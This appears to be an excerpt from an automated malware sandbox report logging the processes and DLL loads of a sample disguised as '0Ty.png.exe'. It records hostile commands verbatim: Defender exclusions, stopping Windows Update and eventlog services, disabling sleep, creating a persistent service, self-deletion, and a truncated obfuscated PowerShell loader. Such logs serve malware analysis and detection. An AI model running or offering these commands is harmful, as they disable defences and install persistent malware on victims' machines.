            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
            Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
            Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
            Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
            Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\dialer.exe dialer.exe
            Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DwpcGqRaxEQb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kwrQxTwRDzvgHI,[Parameter(Position=1)][Type]$doUOZqbWki)$ZycFOOCRuuH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+'o'+[Char](114)+'y'+'M'+'o'+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+'ga'+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+'l'+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+'lass',[MulticastDelegate]);$ZycFOOCRuuH.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+'e'+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+'i'+'d'+[Char](101)+'B'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+','+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kwrQxTwRDzvgHI).SetImplementationFlags(''+'R'+''+'u'+'nt'+'i'+'m'+[Char](101)+','+'M'+''+'a'+''+[Char](110)+''+[Char](97)+'g'+'e'+''+[Char](100)+'');$ZycFOOCRuuH.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+'Sig'+','+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'ir'+[Char](116)+''+'u'+''+'a'+''+[Char](108)+'',$doUOZqbWki,$kwrQxTwRDzvgHI).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $ZycFOOCRuuH.CreateType();}$PIBnzpATGOiSb=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+'e'+''+[Char](109)+''+[Char](46)+'d'+'l'+'l')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+'o'+'s'+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+'.'+'Uns'+[Char](97)+''+[Char](102)+'e'+'N'+''+[Char](97)+'t'+'i'+''+[Char](118)+'eM'+[Char](101)+''+[Char]
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{cf3d95db-0758-4a82-bfdc-72f769e75e83}
            Source: C:\Windows\System32\winlogon.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{0efb55d5-e8e1-4bc9-b3c4-28c83a2f4e5a}
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "HGLZSDMZ"
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "HGLZSDMZ" binpath= "C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe" start= "auto"
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "HGLZSDMZ"
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\0Ty.png.exe"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{cf3d95db-0758-4a82-bfdc-72f769e75e83}
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Process created: C:\Windows\System32\dialer.exe dialer.exe
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{0efb55d5-e8e1-4bc9-b3c4-28c83a2f4e5a}
            Source: C:\Users\user\Desktop\0Ty.png.exe | Section loaded: apphelp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wusa.exe | Section loaded: dpx.dll
            Source: C:\Windows\System32\wusa.exe | Section loaded: wtsapi32.dll
            Source: C:\Windows\System32\wusa.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\wusa.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wusa.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Section loaded: apphelp.dll
            Source: C:\Windows\System32\choice.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wusa.exe | Section loaded: dpx.dll
            Source: C:\Windows\System32\wusa.exe | Section loaded: wtsapi32.dll
            Source: C:\Windows\System32\wusa.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\wusa.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: umpdc.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: mswsock.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: dhcpcsvc6.dll
